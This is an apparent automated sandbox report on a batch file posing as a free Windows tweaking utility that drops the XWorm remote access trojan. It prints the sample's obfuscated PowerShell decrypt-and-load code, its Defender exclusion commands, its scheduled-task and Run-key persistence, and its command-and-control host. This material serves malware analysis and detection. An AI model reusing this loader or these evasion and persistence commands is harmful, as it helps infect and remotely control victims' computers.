Analysis
-
max time kernel
40s -
max time network
40s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
18-01-2025 17:38
Static task
static1
Behavioral task
behavioral1
Sample
Velocity_Free_Tweaking_Utility.bat
Resource
win10ltsc2021-20250113-en
General
-
Target
Velocity_Free_Tweaking_Utility.bat
-
Size
470KB
-
MD5
368de487ff6ae5103c3307a2e0bed635
-
SHA1
0147386ef6eaab1ead49b1c094df3cc68977a708
-
SHA256
7761d40ba646d274001e0243148781fbc722a64546ea208c0ba597265dbf6417
-
SHA512
7105f7bcf98fbb87ffcd9cae17e7cf4e7d3821724dce25a81f1a1e9c4bc24b69a1206dcb532a389759edeca33ce8283599d4bb73b353882dc5b76b47c126cab5
-
SSDEEP
12288:MKvMPgbu1gDThxx0uXGQUKAVXqdeNi7KDJCU2iQQ/Qa4NnK:MKFa1gTqIlA4eNiWDJSHPK
Malware Config
Extracted
xworm
kitchen-alaska.gl.at.ply.gg:4964
-
Install_directory
%AppData%
-
install_file
SubDir.exe
Signatures
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/memory/4948-17-0x000001E06B530000-0x000001E06B5A2000-memory.dmp family_xworm behavioral1/memory/4948-84-0x000001E06B7B0000-0x000001E06B7C8000-memory.dmp family_xworm behavioral1/files/0x002a0000000461bd-125.dat family_xworm behavioral1/memory/1268-136-0x0000000000740000-0x0000000000758000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 4948 powershell.exe 8 4948 powershell.exe 14 4948 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3956 powershell.exe 2908 powershell.exe 2088 powershell.exe 4000 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SubDir.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SubDir.lnk powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1268 XClient.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SubDir = "C:\\Users\\Admin\\AppData\\Roaming\\SubDir.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\System32\Tasks\SubDir svchost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4876 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4000 powershell.exe 4000 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 3956 powershell.exe 3956 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 2908 powershell.exe 2908 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 2088 powershell.exe 2088 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3512 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4948 powershell.exe Token: SeDebugPrivilege 1268 XClient.exe Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2220 svchost.exe Token: SeIncreaseQuotaPrivilege 2220 svchost.exe Token: SeSecurityPrivilege 2220 svchost.exe Token: SeTakeOwnershipPrivilege 2220 svchost.exe Token: SeLoadDriverPrivilege 2220 svchost.exe Token: SeSystemtimePrivilege 2220 svchost.exe Token: SeBackupPrivilege 2220 svchost.exe Token: SeRestorePrivilege 2220 svchost.exe Token: SeShutdownPrivilege 2220 svchost.exe Token: SeSystemEnvironmentPrivilege 2220 svchost.exe Token: SeUndockPrivilege 2220 svchost.exe Token: SeManageVolumePrivilege 2220 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2220 svchost.exe Token: SeIncreaseQuotaPrivilege 2220 svchost.exe Token: SeSecurityPrivilege 2220 svchost.exe Token: SeTakeOwnershipPrivilege 2220 svchost.exe Token: SeLoadDriverPrivilege 2220 svchost.exe Token: SeSystemtimePrivilege 2220 svchost.exe Token: SeBackupPrivilege 2220 svchost.exe Token: SeRestorePrivilege 2220 svchost.exe Token: SeShutdownPrivilege 2220 svchost.exe Token: SeSystemEnvironmentPrivilege 2220 svchost.exe Token: SeUndockPrivilege 2220 svchost.exe Token: SeManageVolumePrivilege 2220 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2220 svchost.exe Token: SeIncreaseQuotaPrivilege 2220 svchost.exe Token: SeSecurityPrivilege 2220 svchost.exe Token: SeTakeOwnershipPrivilege 2220 svchost.exe Token: SeLoadDriverPrivilege 2220 svchost.exe Token: SeSystemtimePrivilege 2220 svchost.exe Token: SeBackupPrivilege 2220 svchost.exe Token: SeRestorePrivilege 2220 svchost.exe Token: SeShutdownPrivilege 2220 svchost.exe Token: SeSystemEnvironmentPrivilege 2220 svchost.exe Token: SeUndockPrivilege 2220 svchost.exe Token: SeManageVolumePrivilege 2220 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2220 svchost.exe Token: SeIncreaseQuotaPrivilege 2220 svchost.exe Token: SeSecurityPrivilege 2220 svchost.exe Token: SeTakeOwnershipPrivilege 2220 svchost.exe Token: SeLoadDriverPrivilege 2220 svchost.exe Token: SeSystemtimePrivilege 2220 svchost.exe Token: SeBackupPrivilege 2220 svchost.exe Token: SeRestorePrivilege 2220 svchost.exe Token: SeShutdownPrivilege 2220 svchost.exe Token: SeSystemEnvironmentPrivilege 2220 svchost.exe Token: SeUndockPrivilege 2220 svchost.exe Token: SeManageVolumePrivilege 2220 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2220 svchost.exe Token: SeIncreaseQuotaPrivilege 2220 svchost.exe Token: SeSecurityPrivilege 2220 svchost.exe Token: SeTakeOwnershipPrivilege 2220 svchost.exe Token: SeLoadDriverPrivilege 2220 svchost.exe Token: SeSystemtimePrivilege 2220 svchost.exe Token: SeBackupPrivilege 2220 svchost.exe Token: SeRestorePrivilege 2220 svchost.exe Token: SeShutdownPrivilege 2220 svchost.exe Token: SeSystemEnvironmentPrivilege 2220 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4860 wrote to memory of 3296 4860 cmd.exe 82 PID 4860 wrote to memory of 3296 4860 cmd.exe 82 PID 4860 wrote to memory of 4948 4860 cmd.exe 83 PID 4860 wrote to memory of 4948 4860 cmd.exe 83 PID 4948 wrote to memory of 3512 4948 powershell.exe 56 PID 4948 wrote to memory of 2752 4948 powershell.exe 46 PID 4948 wrote to memory of 1168 4948 powershell.exe 20 PID 4948 wrote to memory of 1752 4948 powershell.exe 31 PID 4948 wrote to memory of 3520 4948 powershell.exe 57 PID 4948 wrote to memory of 2532 4948 powershell.exe 44 PID 4948 wrote to memory of 2524 4948 powershell.exe 43 PID 4948 wrote to memory of 1932 4948 powershell.exe 34 PID 4948 wrote to memory of 2324 4948 powershell.exe 41 PID 4948 wrote to memory of 1532 4948 powershell.exe 27 PID 4948 wrote to memory of 1728 4948 powershell.exe 30 PID 4948 wrote to memory of 1924 4948 powershell.exe 33 PID 4948 wrote to memory of 740 4948 powershell.exe 15 PID 4948 wrote to memory of 1520 4948 powershell.exe 26 PID 4948 wrote to memory of 1124 4948 powershell.exe 19 PID 4948 wrote to memory of 1456 4948 powershell.exe 25 PID 4948 wrote to memory of 2692 4948 powershell.exe 45 PID 4948 wrote to memory of 2292 4948 powershell.exe 40 PID 4948 wrote to memory of 1944 4948 powershell.exe 35 PID 4948 wrote to memory of 908 4948 powershell.exe 11 PID 4948 wrote to memory of 3664 4948 powershell.exe 58 PID 4948 wrote to memory of 1492 4948 powershell.exe 67 PID 4948 wrote to memory of 4148 4948 powershell.exe 73 PID 4948 wrote to memory of 1680 4948 powershell.exe 29 PID 4948 wrote to memory of 1284 4948 powershell.exe 22 PID 4948 wrote to memory of 2380 4948 powershell.exe 70 PID 4948 wrote to memory of 3508 4948 powershell.exe 71 PID 4948 wrote to memory of 3052 4948 powershell.exe 51 PID 4948 wrote to memory of 956 4948 powershell.exe 12 PID 4948 wrote to memory of 1856 4948 powershell.exe 32 PID 4948 wrote to memory of 2840 4948 powershell.exe 49 PID 4948 wrote to memory of 1392 4948 powershell.exe 36 PID 4948 wrote to memory of 664 4948 powershell.exe 16 PID 4948 wrote to memory of 3208 4948 powershell.exe 55 PID 4948 wrote to memory of 2220 4948 powershell.exe 39 PID 4948 wrote to memory of 1428 4948 powershell.exe 24 PID 4948 wrote to memory of 404 4948 powershell.exe 13 PID 4948 wrote to memory of 2800 4948 powershell.exe 48 PID 4948 wrote to memory of 2404 4948 powershell.exe 42 PID 4948 wrote to memory of 1216 4948 powershell.exe 21 PID 4948 wrote to memory of 744 4948 powershell.exe 14 PID 4948 wrote to memory of 792 4948 powershell.exe 10 PID 4948 wrote to memory of 1396 4948 powershell.exe 23 PID 4948 wrote to memory of 1672 4948 powershell.exe 28 PID 4948 wrote to memory of 800 4948 powershell.exe 66 PID 4948 wrote to memory of 996 4948 powershell.exe 17 PID 4948 wrote to memory of 1584 4948 powershell.exe 37 PID 4948 wrote to memory of 1796 4948 powershell.exe 84 PID 4948 wrote to memory of 1796 4948 powershell.exe 84 PID 4948 wrote to memory of 1268 4948 powershell.exe 86 PID 4948 wrote to memory of 1268 4948 powershell.exe 86 PID 1796 wrote to memory of 3548 1796 cmd.exe 87 PID 1796 wrote to memory of 3548 1796 cmd.exe 87 PID 1796 wrote to memory of 3724 1796 cmd.exe 88 PID 1796 wrote to memory of 3724 1796 cmd.exe 88 PID 1796 wrote to memory of 3596 1796 cmd.exe 89 PID 1796 wrote to memory of 3596 1796 cmd.exe 89 PID 1796 wrote to memory of 2352 1796 cmd.exe 90 PID 1796 wrote to memory of 2352 1796 cmd.exe 90 PID 1796 wrote to memory of 1352 1796 cmd.exe 91 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:792
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵PID:4308
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵PID:1892
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding2⤵PID:1992
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:404
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1456
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1856
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2292
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2324
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2800
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3208
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3512 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Velocity_Free_Tweaking_Utility.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnpmxQANU729MWfimT9pRBSpyJbPXXn82T+WpDZPl7k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XI5lMeQ6bxkYFYuitmF2dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BTAyb=New-Object System.IO.MemoryStream(,$param_var); $uuueC=New-Object System.IO.MemoryStream; $QoOjO=New-Object System.IO.Compression.GZipStream($BTAyb, [IO.Compression.CompressionMode]::Decompress); $QoOjO.CopyTo($uuueC); $QoOjO.Dispose(); $BTAyb.Dispose(); $uuueC.Dispose(); $uuueC.ToArray();}function execute_function($param_var,$param2_var){ $mxfiw=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WfALI=$mxfiw.EntryPoint; $WfALI.Invoke($null, $param2_var);}$bcPKQ = 'C:\Users\Admin\AppData\Local\Temp\Velocity_Free_Tweaking_Utility.bat';$host.UI.RawUI.WindowTitle = $bcPKQ;$hlmzn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bcPKQ).Split([Environment]::NewLine);foreach ($fqbiG in $hlmzn) { if ($fqbiG.StartsWith('jQaeeWFGbtZvamaElQrD')) { $BLrbP=$fqbiG.Substring(20); break; }}$payloads_var=[string[]]$BLrbP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:3296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Velocity_Free_Tweaking_Utility.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"5⤵PID:3548
-
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:3724
-
-
C:\Windows\system32\mode.commode 10005⤵PID:3596
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" " [" nul5⤵PID:2352
-
-
C:\Windows\system32\findstr.exefindstr /v /a:5 /R "^$" "0" nul5⤵PID:1352
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" "]" nul5⤵PID:3976
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" " [" nul5⤵PID:456
-
-
C:\Windows\system32\findstr.exefindstr /v /a:5 /R "^$" "1" nul5⤵PID:2504
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" "]" nul5⤵PID:2348
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" " [" nul5⤵PID:4224
-
-
C:\Windows\system32\findstr.exefindstr /v /a:5 /R "^$" "2" nul5⤵PID:2340
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" "]" nul5⤵PID:472
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" " [" nul5⤵PID:5008
-
-
C:\Windows\system32\findstr.exefindstr /v /a:5 /R "^$" "3" nul5⤵PID:4904
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" "]" nul5⤵PID:4464
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" " [" nul5⤵PID:756
-
-
C:\Windows\system32\findstr.exefindstr /v /a:5 /R "^$" "4" nul5⤵PID:1576
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" "]" nul5⤵PID:1828
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" " [" nul5⤵PID:2620
-
-
C:\Windows\system32\findstr.exefindstr /v /a:5 /R "^$" "5" nul5⤵PID:4292
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" "]" nul5⤵PID:3616
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" " [" nul5⤵PID:2132
-
-
C:\Windows\system32\findstr.exefindstr /v /a:5 /R "^$" "6" nul5⤵PID:4192
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" "]" nul5⤵PID:3132
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" " [" nul5⤵PID:3232
-
-
C:\Windows\system32\findstr.exefindstr /v /a:5 /R "^$" "7" nul5⤵PID:3692
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" "]" nul5⤵PID:3816
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" " [" nul5⤵PID:420
-
-
C:\Windows\system32\findstr.exefindstr /v /a:5 /R "^$" "8" nul5⤵PID:4032
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" "]" nul5⤵PID:3576
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" " [" nul5⤵PID:1508
-
-
C:\Windows\system32\findstr.exefindstr /v /a:5 /R "^$" "9" nul5⤵PID:4624
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" "]" nul5⤵PID:2240
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" " [" nul5⤵PID:3644
-
-
C:\Windows\system32\findstr.exefindstr /v /a:5 /R "^$" "10" nul5⤵PID:704
-
-
C:\Windows\system32\findstr.exefindstr /v /a:F /R "^$" "]" nul5⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\SubDir.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SubDir.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2088
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SubDir" /tr "C:\Users\Admin\AppData\Roaming\SubDir.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4876
-
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Control Panel\Cursors" /v "Wait" /t REG_EXPAND_SZ /d "" /f3⤵PID:4680
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Control Panel\Cursors" /ve /t REG_SZ /d "" /f3⤵PID:1152
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl" /v "Win32PrioritySeparation" /t REG_DWORD /d "40" /f3⤵PID:4044
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl" /v "IRQ8Priority" /t REG_DWORD /d "1" /f3⤵PID:2760
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl" /v "IRQ16Priority" /t REG_DWORD /d "2" /f3⤵PID:3972
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl" /v "ConvertibleSlateMode" /t REG_DWORD /d "0" /f3⤵PID:1848
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f3⤵PID:3504
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\GoogleChromeElevationService" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:320
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1252
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\gupdatem" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1600
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\MicrosoftEdgeElevationService" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2436
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\edgeupdate" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3744
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\edgeupdatem" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1156
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\MozillaMaintenance" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:636
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Origin Client Service" /v "Start" /t REG_DWORD /d "3" /f3⤵PID:2424
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Origin Web Helper Service" /v "Start" /t REG_DWORD /d "3" /f3⤵PID:4700
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" /v "Start" /t REG_DWORD /d "3" /f3⤵PID:2104
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:800
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1492
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3508
-
